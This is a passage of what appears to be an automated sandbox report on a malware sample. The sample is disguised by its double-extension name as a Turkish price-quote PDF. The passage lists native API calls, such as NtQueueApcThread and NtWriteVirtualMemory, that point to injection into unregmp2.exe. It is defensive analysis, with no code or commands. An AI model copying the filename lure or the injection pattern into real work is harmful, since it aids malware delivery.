Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12F90 NtProtectVirtualMemory, 7_2_01B12F90
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12FE0 NtCreateFile, 7_2_01B12FE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12F30 NtCreateSection, 7_2_01B12F30
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12F60 NtCreateProcessEx, 7_2_01B12F60
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12EA0 NtAdjustPrivilegesToken, 7_2_01B12EA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12E80 NtReadVirtualMemory, 7_2_01B12E80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12EE0 NtQueueApcThread, 7_2_01B12EE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12E30 NtWriteVirtualMemory, 7_2_01B12E30
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B13090 NtSetValueKey, 7_2_01B13090
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B13010 NtOpenDirectoryObject, 7_2_01B13010
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B139B0 NtGetContextThread, 7_2_01B139B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B13D10 NtOpenProcessToken, 7_2_01B13D10
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B13D70 NtOpenThread, 7_2_01B13D70
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D44650 NtSuspendThread,LdrInitializeThunk, 9_2_04D44650
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D44340 NtSetContextThread,LdrInitializeThunk, 9_2_04D44340
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_04D42CA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_04D42C70
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42C60 NtCreateKey,LdrInitializeThunk, 9_2_04D42C60
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42DD0 NtDelayExecution,LdrInitializeThunk, 9_2_04D42DD0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_04D42DF0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_04D42D10
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42D30 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_04D42D30
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42EE0 NtQueueApcThread,LdrInitializeThunk, 9_2_04D42EE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42E80 NtReadVirtualMemory,LdrInitializeThunk, 9_2_04D42E80
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42FE0 NtCreateFile,LdrInitializeThunk, 9_2_04D42FE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42FB0 NtResumeThread,LdrInitializeThunk, 9_2_04D42FB0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42F30 NtCreateSection,LdrInitializeThunk, 9_2_04D42F30
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42AD0 NtReadFile,LdrInitializeThunk, 9_2_04D42AD0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42AF0 NtWriteFile,LdrInitializeThunk, 9_2_04D42AF0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_04D42BF0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_04D42BE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42BA0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_04D42BA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42B60 NtClose,LdrInitializeThunk, 9_2_04D42B60
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D435C0 NtCreateMutant,LdrInitializeThunk, 9_2_04D435C0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D439B0 NtGetContextThread,LdrInitializeThunk, 9_2_04D439B0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42CC0 NtQueryVirtualMemory, 9_2_04D42CC0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42CF0 NtOpenProcess, 9_2_04D42CF0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42C00 NtQueryInformationProcess, 9_2_04D42C00
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42DB0 NtEnumerateKey, 9_2_04D42DB0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42D00 NtSetInformationFile, 9_2_04D42D00
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42EA0 NtAdjustPrivilegesToken, 9_2_04D42EA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42E30 NtWriteVirtualMemory, 9_2_04D42E30
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42F90 NtProtectVirtualMemory, 9_2_04D42F90
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42FA0 NtQuerySection, 9_2_04D42FA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42F60 NtCreateProcessEx, 9_2_04D42F60
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42AB0 NtWaitForSingleObject, 9_2_04D42AB0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D42B80 NtQueryInformationFile, 9_2_04D42B80
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D43090 NtSetValueKey, 9_2_04D43090
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D43010 NtOpenDirectoryObject, 9_2_04D43010
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D43D70 NtOpenThread, 9_2_04D43D70
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D43D10 NtOpenProcessToken, 9_2_04D43D10
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BE8140 NtAllocateVirtualMemory, 9_2_00BE8140
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BE7D00 NtCreateFile, 9_2_00BE7D00
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BE7E60 NtReadFile, 9_2_00BE7E60
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BE7FE0 NtClose, 9_2_00BE7FE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BE7F40 NtDeleteFile, 9_2_00BE7F40
Detected potential crypto function
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_011DD4FC 0_2_011DD4FC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D1880 0_2_075D1880
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D44B0 0_2_075D44B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D44A0 0_2_075D44A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D5FC0 0_2_075D5FC0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D5B88 0_2_075D5B88
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075DAAE0 0_2_075DAAE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D1870 0_2_075D1870
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D48E8 0_2_075D48E8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D6898 0_2_075D6898
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004010D0 7_2_004010D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004168DE 7_2_004168DE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004168E3 7_2_004168E3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0042D8B3 7_2_0042D8B3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004101C3 7_2_004101C3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040E243 7_2_0040E243
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401260 7_2_00401260
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00403210 7_2_00403210
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401B8B 7_2_00401B8B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401B90 7_2_00401B90
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004024E0 7_2_004024E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040FF9B 7_2_0040FF9B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040279D 7_2_0040279D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004027A0 7_2_004027A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040FFA3 7_2_0040FFA3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA01AA 7_2_01BA01AA
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B941A2 7_2_01B941A2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B981CC 7_2_01B981CC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0100 7_2_01AD0100
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7A118 7_2_01B7A118
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B68158 7_2_01B68158
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B72000 7_2_01B72000
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA03E6 7_2_01BA03E6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEE3F0 7_2_01AEE3F0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9A352 7_2_01B9A352
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B602C0 7_2_01B602C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B80274 7_2_01B80274
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA0591 7_2_01BA0591
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8E4F6 7_2_01B8E4F6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B84420 7_2_01B84420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B92446 7_2_01B92446
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADC7C0 7_2_01ADC7C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B04750 7_2_01B04750
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFC6E0 7_2_01AFC6E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BAA9A6 7_2_01BAA9A6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF6962 7_2_01AF6962
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC68B8 7_2_01AC68B8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E8F0 7_2_01B0E8F0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE2840 7_2_01AE2840
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEA840 7_2_01AEA840
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B96BD7 7_2_01B96BD7
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9AB40 7_2_01B9AB40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF8DBF 7_2_01AF8DBF
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADADE0 7_2_01ADADE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7CD1F 7_2_01B7CD1F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEAD00 7_2_01AEAD00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B80CB5 7_2_01B80CB5
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0CF2 7_2_01AD0CF2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0C00 7_2_01AE0C00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5EFA0 7_2_01B5EFA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AECFE0 7_2_01AECFE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD2FC8 7_2_01AD2FC8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B00F30 7_2_01B00F30
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B82F30 7_2_01B82F30
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B22F28 7_2_01B22F28
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B54F40 7_2_01B54F40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9CE93 7_2_01B9CE93
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2E90 7_2_01AF2E90
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9EEDB 7_2_01B9EEDB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9EE26 7_2_01B9EE26
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0E59 7_2_01AE0E59
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEB1B0 7_2_01AEB1B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BAB16B 7_2_01BAB16B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1516C 7_2_01B1516C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACF172 7_2_01ACF172
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B970E9 7_2_01B970E9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9F0E0 7_2_01B9F0E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE70C0 7_2_01AE70C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8F0CC 7_2_01B8F0CC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B2739A 7_2_01B2739A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9132D 7_2_01B9132D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACD34C 7_2_01ACD34C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE52A0 7_2_01AE52A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B812ED 7_2_01B812ED
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFB2C0 7_2_01AFB2C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7D5B0 7_2_01B7D5B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA95C3 7_2_01BA95C3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B97571 7_2_01B97571
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9F43F 7_2_01B9F43F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD1460 7_2_01AD1460
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9F7B0 7_2_01B9F7B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B916CC 7_2_01B916CC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B25630 7_2_01B25630
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B75910 7_2_01B75910
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE9950 7_2_01AE9950
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFB950 7_2_01AFB950
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE38E0 7_2_01AE38E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4D800 7_2_01B4D800
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFFB80 7_2_01AFFB80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B55BF0 7_2_01B55BF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1DBF9 7_2_01B1DBF9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9FB76 7_2_01B9FB76
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B25AA0 7_2_01B25AA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7DAAC 7_2_01B7DAAC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B81AA3 7_2_01B81AA3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8DAC6 7_2_01B8DAC6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B53A6C 7_2_01B53A6C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9FA49 7_2_01B9FA49
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B97A46 7_2_01B97A46
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFFDC0 7_2_01AFFDC0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B97D73 7_2_01B97D73
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B91D5A 7_2_01B91D5A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE3D40 7_2_01AE3D40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9FCF2 7_2_01B9FCF2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B59C32 7_2_01B59C32
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9FFB1 7_2_01B9FFB1
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE1F92 7_2_01AE1F92
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA3FD2 7_2_01AA3FD2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA3FD5 7_2_01AA3FD5
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9FF09 7_2_01B9FF09
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE9EB0 7_2_01AE9EB0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DBE4F6 9_2_04DBE4F6
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC2446 9_2_04DC2446
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB4420 9_2_04DB4420
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DD0591 9_2_04DD0591
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D10535 9_2_04D10535
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D2C6E0 9_2_04D2C6E0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D0C7C0 9_2_04D0C7C0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D34750 9_2_04D34750
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D10770 9_2_04D10770
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DA2000 9_2_04DA2000
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC81CC 9_2_04DC81CC
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DD01AA 9_2_04DD01AA
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D98158 9_2_04D98158
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DAA118 9_2_04DAA118
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D00100 9_2_04D00100
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D902C0 9_2_04D902C0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB0274 9_2_04DB0274
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D1E3F0 9_2_04D1E3F0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DD03E6 9_2_04DD03E6
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCA352 9_2_04DCA352
